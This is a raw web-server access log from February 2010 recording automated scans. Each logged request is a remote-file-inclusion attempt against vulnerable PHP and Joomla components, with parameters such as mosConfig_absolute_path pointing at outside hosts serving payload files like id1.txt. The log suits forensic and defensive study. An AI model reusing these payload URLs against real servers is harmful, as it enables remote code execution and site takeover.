218.38.136.126 - - [07/Feb/2010:19:56:21 -0500] "GET /log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 348
218.38.136.126 - - [07/Feb/2010:19:56:22 -0500] "GET /log/sdaglobal.org-access_log%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 375
218.38.136.126 - - [07/Feb/2010:19:56:24 -0500] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 344
218.38.136.126 - - [07/Feb/2010:19:56:24 -0500] "GET /log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 348
218.38.136.126 - - [07/Feb/2010:19:56:25 -0500] "GET /log/sdaglobal.org-access_log%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 375
218.38.136.126 - - [07/Feb/2010:19:56:29 -0500] "GET /log/sdaglobal.org-access_log%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 375
218.38.136.125 - - [07/Feb/2010:19:56:49 -0500] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 344
218.38.136.125 - - [07/Feb/2010:19:56:52 -0500] "GET /log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 348
218.38.136.125 - - [07/Feb/2010:19:56:52 -0500] "GET /log/sdaglobal.org-access_log%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 375
69.163.202.84 - - [07/Feb/2010:19:58:57 -0500] "GET /log/sdaglobal.org-access_log.1//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 375
211.115.213.229 - - [07/Feb/2010:20:00:29 -0500] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 344
211.115.213.229 - - [07/Feb/2010:20:00:29 -0500] "GET /log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 348
211.115.213.229 - - [07/Feb/2010:20:00:37 -0500] "GET /log/sdaglobal.org-access_log%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 375
200.93.147.154 - - [07/Feb/2010:20:01:53 -0500] "GET /log///components/com_facileforms/facileforms.frame.php?ff_compath=http://musicadelibreria.net/header?? HTTP/1.1" 404 335
200.93.147.154 - - [07/Feb/2010:20:01:53 -0500] "GET /log/sdaglobal.org-error_log.2%20%20///components/com_facileforms/facileforms.frame.php?ff_compath=http://musicadelibreria.net/header?? HTTP/1.1" 404 363
200.93.147.154 - - [07/Feb/2010:20:01:53 -0500] "GET ///components/com_facileforms/facileforms.frame.php?ff_compath=http://musicadelibreria.net/header?? HTTP/1.1" 404 331
220.73.144.196 - - [07/Feb/2010:20:03:14 -0500] "GET /log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.outdoorbooks.co.kr/admin/category/1.txt???? HTTP/1.1" 404 296
220.73.144.196 - - [07/Feb/2010:20:03:14 -0500] "GET /log/sdaglobal.org-access_log.1%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.outdoorbooks.co.kr/admin/category/1.txt???? HTTP/1.1" 404 325
220.73.144.196 - - [07/Feb/2010:20:03:14 -0500] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.outdoorbooks.co.kr/admin/category/1.txt???? HTTP/1.1" 404 292
200.93.147.154 - - [07/Feb/2010:20:03:17 -0500] "GET ///components/com_facileforms/facileforms.frame.php?ff_compath=http://musicadelibreria.net/header?? HTTP/1.1" 404 331
200.93.147.154 - - [07/Feb/2010:20:03:17 -0500] "GET /log/sdaglobal.org-error_log.2%20%20///components/com_facileforms/facileforms.frame.php?ff_compath=http://musicadelibreria.net/header?? HTTP/1.1" 404 363
200.93.147.154 - - [07/Feb/2010:20:03:18 -0500] "GET /log///components/com_facileforms/facileforms.frame.php?ff_compath=http://musicadelibreria.net/header?? HTTP/1.1" 404 335
220.73.144.196 - - [07/Feb/2010:20:03:31 -0500] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.outdoorbooks.co.kr/admin/category/1.txt???? HTTP/1.1" 404 292
220.73.144.196 - - [07/Feb/2010:20:03:31 -0500] "GET /log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.outdoorbooks.co.kr/admin/category/1.txt???? HTTP/1.1" 404 296
220.73.144.196 - - [07/Feb/2010:20:03:31 -0500] "GET /log/sdaglobal.org-access_log.1%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.outdoorbooks.co.kr/admin/category/1.txt???? HTTP/1.1" 404 325
81.176.226.164 - - [07/Feb/2010:20:03:37 -0500] "GET /log/sdaglobal.org-access_log.1//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 375
220.73.144.196 - - [07/Feb/2010:20:04:20 -0500] "GET /log/sdaglobal.org-access_log.4%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.outdoorbooks.co.kr/admin/category/1.txt???? HTTP/1.1" 404 325
220.73.144.196 - - [07/Feb/2010:20:04:31 -0500] "GET /log/sdaglobal.org-access_log.4%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.outdoorbooks.co.kr/admin/category/1.txt???? HTTP/1.1" 404 325
218.38.136.125 - - [07/Feb/2010:20:04:48 -0500] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 344
218.38.136.125 - - [07/Feb/2010:20:04:48 -0500] "GET /log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 348
218.38.136.125 - - [07/Feb/2010:20:04:55 -0500] "GET /log/sdaglobal.org-access_log%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 375
194.1.150.2 - - [07/Feb/2010:20:05:07 -0500] "GET //?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://nic.bupt.edu.cn/media/id1.txt?? HTTP/1.1" 200 9426
194.1.150.2 - - [07/Feb/2010:20:05:07 -0500] "GET /log/sdaglobal.org-access_log.4%20%20//?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://nic.bupt.edu.cn/media/id1.txt?? HTTP/1.1" 404 315
194.1.150.2 - - [07/Feb/2010:20:05:07 -0500] "GET /log//?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://nic.bupt.edu.cn/media/id1.txt?? HTTP/1.1" 200 59643
200.93.147.154 - - [07/Feb/2010:20:05:11 -0500] "GET /log/sdaglobal.org-error_log.4%20%20///components/com_facileforms/facileforms.frame.php?ff_compath=http://musicadelibreria.net/header?? HTTP/1.1" 404 363
200.93.147.154 - - [07/Feb/2010:20:05:22 -0500] "GET /log///components/com_facileforms/facileforms.frame.php?ff_compath=http://musicadelibreria.net/header?? HTTP/1.1" 404 335
200.93.147.154 - - [07/Feb/2010:20:05:22 -0500] "GET /log/sdaglobal.org-error_log.2%20%20///components/com_facileforms/facileforms.frame.php?ff_compath=http://musicadelibreria.net/header?? HTTP/1.1" 404 363
200.93.147.154 - - [07/Feb/2010:20:05:28 -0500] "GET /log/sdaglobal.org-error_log.4%20%20///components/com_facileforms/facileforms.frame.php?ff_compath=http://musicadelibreria.net/header?? HTTP/1.1" 404 363
218.38.136.125 - - [07/Feb/2010:20:06:19 -0500] "GET /log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 348
218.38.136.125 - - [07/Feb/2010:20:06:23 -0500] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 344
218.38.136.125 - - [07/Feb/2010:20:06:24 -0500] "GET /log/sdaglobal.org-access_log%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 375
200.93.147.154 - - [07/Feb/2010:20:06:39 -0500] "GET /log/sdaglobal.org-error_log.4%20%20///components/com_facileforms/facileforms.frame.php?ff_compath=http://musicadelibreria.net/header?? HTTP/1.1" 404 363
218.38.136.125 - - [07/Feb/2010:20:06:45 -0500] "GET /log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 348
218.38.136.125 - - [07/Feb/2010:20:06:46 -0500] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 344
218.38.136.125 - - [07/Feb/2010:20:06:51 -0500] "GET /log/sdaglobal.org-access_log%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 375
218.38.136.125 - - [07/Feb/2010:20:07:46 -0500] "GET /log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 348
218.38.136.125 - - [07/Feb/2010:20:07:47 -0500] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 344
218.38.136.125 - - [07/Feb/2010:20:07:49 -0500] "GET /log/sdaglobal.org-access_log%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 375
218.38.136.125 - - [07/Feb/2010:20:08:53 -0500] "GET /log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 348
218.38.136.125 - - [07/Feb/2010:20:08:59 -0500] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 344
218.38.136.125 - - [07/Feb/2010:20:09:01 -0500] "GET /log/sdaglobal.org-access_log%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 375
218.38.136.125 - - [07/Feb/2010:20:09:02 -0500] "GET /log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 348
218.38.136.125 - - [07/Feb/2010:20:09:05 -0500] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 344
218.38.136.125 - - [07/Feb/2010:20:09:06 -0500] "GET /log/sdaglobal.org-access_log%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 375
194.1.150.2 - - [07/Feb/2010:20:09:21 -0500] "GET /log/sdaglobal.org-access_log.4%20%20//?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://nic.bupt.edu.cn/media/id1.txt?? HTTP/1.1" 404 315
194.1.150.2 - - [07/Feb/2010:20:09:21 -0500] "GET //?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://nic.bupt.edu.cn/media/id1.txt?? HTTP/1.1" 200 9426
194.1.150.2 - - [07/Feb/2010:20:09:21 -0500] "GET /log//?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://nic.bupt.edu.cn/media/id1.txt?? HTTP/1.1" 200 59643
218.38.136.125 - - [07/Feb/2010:20:09:47 -0500] "GET /log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 348
218.38.136.125 - - [07/Feb/2010:20:09:51 -0500] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 344
218.38.136.125 - - [07/Feb/2010:20:09:52 -0500] "GET /log/sdaglobal.org-access_log%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 375
218.38.136.125 - - [07/Feb/2010:20:09:58 -0500] "GET /log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 348
218.38.136.125 - - [07/Feb/2010:20:10:01 -0500] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 344
218.38.136.125 - - [07/Feb/2010:20:10:03 -0500] "GET /log/sdaglobal.org-access_log%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 375
211.192.139.164 - - [07/Feb/2010:20:11:54 -0500] "GET /log//appserv/main.php?appserv_root=http://suzuki6.fileave.com/zfxid1.txt? HTTP/1.1" 404 302
211.192.139.164 - - [07/Feb/2010:20:11:54 -0500] "GET //appserv/main.php?appserv_root=http://suzuki6.fileave.com/zfxid1.txt? HTTP/1.1" 404 298
211.192.139.164 - - [07/Feb/2010:20:11:54 -0500] "GET /log/sdaglobal.org-access_log.1%20%20//appserv/main.php?appserv_root=http://suzuki6.fileave.com/zfxid1.txt? HTTP/1.1" 404 331
211.192.139.164 - - [07/Feb/2010:20:14:49 -0500] "GET /log/sdaglobal.org-access_log%20%20//appserv/main.php?appserv_root=http://suzuki6.fileave.com/zfxid1.txt? HTTP/1.1" 404 329
81.176.226.164 - - [07/Feb/2010:20:15:03 -0500] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 317
81.176.226.164 - - [07/Feb/2010:20:15:09 -0500] "GET /log/components/com_performs/performs.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 321
81.176.226.164 - - [07/Feb/2010:20:15:09 -0500] "GET /log/sdaglobal.org-access_log/components/com_performs/performs.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 346
69.163.202.84 - - [07/Feb/2010:20:16:49 -0500] "GET /log/sdaglobal.org-access_log/components/com_performs/performs.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 346
69.163.202.84 - - [07/Feb/2010:20:16:49 -0500] "GET /log/components/com_performs/performs.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 321
69.163.202.84 - - [07/Feb/2010:20:16:49 -0500] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 317
89.36.175.10 - - [07/Feb/2010:20:16:55 -0500] "GET /log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://ios.co.kr/files_income/income/id1.jpg?? HTTP/1.1" 404 348
89.36.175.10 - - [07/Feb/2010:20:16:55 -0500] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://ios.co.kr/files_income/income/id1.jpg?? HTTP/1.1" 404 344
89.36.175.10 - - [07/Feb/2010:20:17:13 -0500] "GET /log/sdaglobal.org-access_log%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://ios.co.kr/files_income/income/id1.jpg?? HTTP/1.1" 404 375
81.176.226.164 - - [07/Feb/2010:20:20:18 -0500] "GET /log/sdaglobal.org-access_log%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 348
218.38.136.126 - - [07/Feb/2010:20:21:14 -0500] "GET /log/sdaglobal.org-access_log/components/com_performs/performs.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 346
218.38.136.126 - - [07/Feb/2010:20:21:14 -0500] "GET /log/components/com_performs/performs.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 321
218.38.136.126 - - [07/Feb/2010:20:21:14 -0500] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 317
218.38.136.126 - - [07/Feb/2010:20:21:17 -0500] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 317
218.38.136.126 - - [07/Feb/2010:20:21:17 -0500] "GET /log/sdaglobal.org-access_log/components/com_performs/performs.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 346
218.38.136.126 - - [07/Feb/2010:20:21:17 -0500] "GET /log/components/com_performs/performs.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 321
200.93.147.154 - - [07/Feb/2010:20:21:18 -0500] "GET /log/sdaglobal.org-access_log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 362
200.93.147.154 - - [07/Feb/2010:20:21:18 -0500] "GET /log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 337
200.93.147.154 - - [07/Feb/2010:20:21:18 -0500] "GET ///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 333
218.38.136.126 - - [07/Feb/2010:20:21:25 -0500] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 317
218.38.136.126 - - [07/Feb/2010:20:21:25 -0500] "GET /log/components/com_performs/performs.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 321
218.38.136.126 - - [07/Feb/2010:20:21:25 -0500] "GET /log/sdaglobal.org-access_log/components/com_performs/performs.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 346
218.38.136.126 - - [07/Feb/2010:20:21:26 -0500] "GET /log/sdaglobal.org-access_log/components/com_performs/performs.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 346
218.38.136.126 - - [07/Feb/2010:20:21:26 -0500] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 317
218.38.136.126 - - [07/Feb/2010:20:21:26 -0500] "GET /log/components/com_performs/performs.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 321
218.38.136.126 - - [07/Feb/2010:20:21:27 -0500] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 317
218.38.136.126 - - [07/Feb/2010:20:21:27 -0500] "GET /log/components/com_performs/performs.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 321
218.38.136.126 - - [07/Feb/2010:20:21:27 -0500] "GET /log/sdaglobal.org-access_log/components/com_performs/performs.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 346
66.103.128.44 - - [07/Feb/2010:20:21:27 -0500] "GET /log/sdaglobal.org-access_log.4/board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 419
66.103.128.44 - - [07/Feb/2010:20:21:27 -0500] "GET /log/board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 392
66.103.128.44 - - [07/Feb/2010:20:21:27 -0500] "GET /board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 388
66.103.128.44 - - [07/Feb/2010:20:21:31 -0500] "GET /board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://bethelphotoworks.com//joomla15/templates/rt_perihelion/id1.txt??? HTTP/1.1" 404 388
66.103.128.44 - - [07/Feb/2010:20:21:31 -0500] "GET /log/board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://bethelphotoworks.com//joomla15/templates/rt_perihelion/id1.txt??? HTTP/1.1" 404 392
66.103.128.44 - - [07/Feb/2010:20:21:31 -0500] "GET /log/sdaglobal.org-access_log.4/board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://bethelphotoworks.com//joomla15/templates/rt_perihelion/id1.txt??? HTTP/1.1" 404 419
89.36.175.10 - - [07/Feb/2010:20:22:41 -0500] "GET /log/sdaglobal.org-access_log.1//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://ios.co.kr/files_income/income/id1.jpg?? HTTP/1.1" 404 375
211.115.213.229 - - [07/Feb/2010:20:22:42 -0500] "GET /log/components/com_performs/performs.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 321
211.115.213.229 - - [07/Feb/2010:20:22:42 -0500] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 317
211.115.213.229 - - [07/Feb/2010:20:22:42 -0500] "GET /log/sdaglobal.org-access_log/components/com_performs/performs.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 346
218.38.136.125 - - [07/Feb/2010:20:22:45 -0500] "GET /log/components/com_performs/performs.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 321
218.38.136.125 - - [07/Feb/2010:20:22:45 -0500] "GET /log/sdaglobal.org-access_log/components/com_performs/performs.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 346
218.38.136.125 - - [07/Feb/2010:20:22:49 -0500] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 317
69.163.202.84 - - [07/Feb/2010:20:23:31 -0500] "GET /log/sdaglobal.org-access_log%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 348
115.68.4.44 - - [07/Feb/2010:20:24:06 -0500] "GET /write_comment_update.php?board_skin_path=http://www.sarpifirenze.it/media/id1.txt??? HTTP/1.1" 404 305
115.68.4.44 - - [07/Feb/2010:20:24:06 -0500] "GET /log/sdaglobal.org-access_log.4/write_comment_update.php?board_skin_path=http://www.sarpifirenze.it/media/id1.txt??? HTTP/1.1" 404 336
89.36.175.10 - - [07/Feb/2010:20:24:32 -0500] "GET /log/sdaglobal.org-access_log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://ios.co.kr/files_income/income/id1.jpg?? HTTP/1.1" 404 373
200.93.147.154 - - [07/Feb/2010:20:25:06 -0500] "GET /log/sdaglobal.org-access_log///components/com_facileforms/facileforms.frame.php?ff_compath=http://musicadelibreria.net/header?? HTTP/1.1" 404 360
115.68.4.44 - - [07/Feb/2010:20:26:01 -0500] "GET /log/write_comment_update.php?board_skin_path=http://www.sarpifirenze.it/media/id1.txt??? HTTP/1.1" 404 309
115.68.4.44 - - [07/Feb/2010:20:26:02 -0500] "GET /write_comment_update.php?board_skin_path=http://www.sarpifirenze.it/media/id1.txt??? HTTP/1.1" 404 305
218.38.136.125 - - [07/Feb/2010:20:26:14 -0500] "GET /log/components/com_performs/performs.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 321
218.38.136.125 - - [07/Feb/2010:20:26:15 -0500] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 317
218.38.136.125 - - [07/Feb/2010:20:26:15 -0500] "GET /log/sdaglobal.org-access_log/components/com_performs/performs.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 346
